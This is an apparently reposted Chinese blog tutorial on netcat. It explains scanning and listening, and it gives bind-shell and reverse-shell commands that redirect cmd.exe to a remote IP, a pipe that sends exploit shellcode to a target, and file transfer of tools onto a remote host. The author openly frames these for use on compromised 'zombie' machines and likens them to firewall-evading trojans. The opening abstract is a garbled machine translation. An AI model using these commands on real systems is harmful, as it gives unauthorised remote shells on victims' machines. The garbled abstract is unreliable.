nc使用方法

摘要:
类似地,上述两个是相同的。让我们尝试命令2:程序方向nc-l-pport-t-ecmd.exe本地计算机:nc-l-port或nc-l-v-port目标计算机:nc-ecmd.exeipport参数解释:-l和-p参数已解释-e;该函数是程序导向t:以telnet的形式回答示例nc-l-p5277-t-ecmd.exe。你知道它在哪里吗?本地机器:nc-l-pportremotemachine:nc-ecmd.exeipport你知道灰鸽子和运动鞋。这两种工具都使用反弹端口类型的特洛伊木马。反弹端口是什么?)Nc-l-p5277也可以在本地运行,然后使用Nc-l-v-p5277在远程计算机上运行。如果您想找到运行nc-ecmd.exeip5277的方法,请致电xxx。xxx。xxx!!

1)连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口  

2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口

3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口  

4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口  

5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

6)作攻击程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:\exploit.txt'为shellcode等

7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止

8)作蜜罐用[2],例子:
格式:nc -L -p 80>c:\log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把'& gt;' 改为'>>'即可以追加日志 附:'c:\log.txt'为日志等

9)作蜜罐用[3],例子:
格式1:nc -L -p 80  
格式2:type.exe c:\honeypot.txt|nc -L -p 80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容'送'入其管道中

命令1:监听命令

nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port

参数解释:

-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

提示:一般大家都爱用-vv

nc -l -p 80

这个很简单,监听80端口
如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!

nc -l -p 80 > e:\log.dat

呵呵,功能和上边一样,但是后边加了个“> e:\log.dat”我想,学过ECHO那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件

nc -l -v -p 80

和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC的屏幕上。

呵呵,讲了这么多,来实践下

nc -l -v -p 80

然后在浏览器中输入本机IP:127.0.0.1
呵呵,看到什么?

同样,上边两个也是一样,大家自己试验一下吧

命令2:程序定向

nc -l -p port -t -e cmd.exe

本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port

参数解释:

-l、-p两个参数已经解释过了
-e;作用就是程序定向
-t:以telnet的形式来应答

例子

nc -l -p 5277 -t -e cmd.exe

知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。

说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)

呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
HOHO~~如何?

local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port

大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。


这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)

nc -l -p 5277 (坚听本地5277端口)

同样也可以用

nc -l -v -p 5277

运行在本地然后在远程机器上,想办法运行

nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!

呵呵,看看在本地机器上出现了什么?

这样就是反弹~~在本地机器上得到了一个SHELL

命令3:扫描端口

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port


参数解释:

-z:将输入输出关掉,在扫描时使用

nc -v ip port

这个命令是针对某一个端口进行扫描

例如:

nc -v ip 135

扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息

例如:80端口

我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息

nc -v -z ip port-port

这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围

例如:

nc -v -z ip 1-200

可以看到我机器上的1-200的TCP端口的开放情况


nc -v -z -u ip port-port

这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的

例如:

nc -v -z -u ip 1-200

这个命令就会扫1-200的UDP端口

命令4:传送文件(HOHO,I LIKE)

LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe

参数解释:

-n:指定数字的IP地址

这两个命令结合起来是用来传送文件的

首先,在远程机上运行命令:

nc -v -l -p 5277 > c:\pulist.exe

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口并把接受到的信息数据写到c:\pulist.exe中.这时候在本地机上运行

nc -v -n ip 5277 < e:\hack\pulist.exe

这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上.这样远程主机就会自动创建一个pulist.exe文件。。呵呵,你想到了吗??

免责声明:文章转载自《nc使用方法》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇Windows2003防黑客入侵:系统权限与安全配置突破安全狗的技术总汇下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Nmap在实战中的高级用法(详解)

@ 目录 Nmap在实战中的高级用法(详解) Nmap简单的扫描方式: 一、Nmap高级选项 1、查看本地路由与接口 2、指定网口与IP地址 3、定制探测包 二、Nmap扫描防火墙 1、SYN扫描 2、FIN扫描 3、ACK扫描 4、Window扫描 三、扫描路由器 1、扫描思科路由器 2、扫描路由器TFTP 3、扫描路由器操作系统...

BE Learing 4 安装remote agent

1 安装remote agent 1.1 安装 BE的帮助说的让人头晕。 简单的办法就是在安装好的BE机器的安装目录下拷贝C:/Program Files/Symantec/Backup Exec/Agents/Raws32到远程服务器的任意目录下,如C:/,登陆远程服务器,打开cmd,进入C:/Raws32目录执行setupaa,就ok了。 1.2 配...

memcache的最佳实践方案。

基本问题 1、memcached的基本设置 1)启动Memcache的服务器端 # /usr/local/bin/memcached -d -m 10 -u root -l 192.168.0.200 -p 12000 -c 256 -P /tmp/memcached.pid -d选项是启动一个守护进程, -m是分配给Memcache使用的内存数量,...

端口对应服务的相应漏洞 端口入侵 端口漏洞

端口对应服务的相应漏洞 端口入侵 端口漏洞 爆破 未授权访问 远程代码执行 Java反序列 webshell 弱口令 认证绕过 缓冲区溢出注入攻击 Shift后门 TNS注入攻击 端口号 服务 说明 0 Reserve 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种...

【树莓派】iptables相关配置

关于iptables的配置,参见官方资料:http://wiki.ubuntu.org.cn/IptablesHowTo最好。 进入iptables # sudo iptables -L 列出目前的ip策略. 如果您刚刚配置好服务器,您是没有设置ip规则的,您要自己设置。 Chain INPUT (policy ACCEPT) target...

Docker配置文件-Dockerfile详解

1.Dockerfile中所用的所有文件一定要和Dockerfile文件在同一级父目录下,可以为Dockerfile父目录的子目录2.Dockerfile中相对路径默认都是Dockerfile所在的目录3.Dockerfile中一定要惜字如金,能写到一行的指令,一定要写到一行,原因是分层构建,联合挂载这个特性。Dockerfile中每一条指令被视为一层4.D...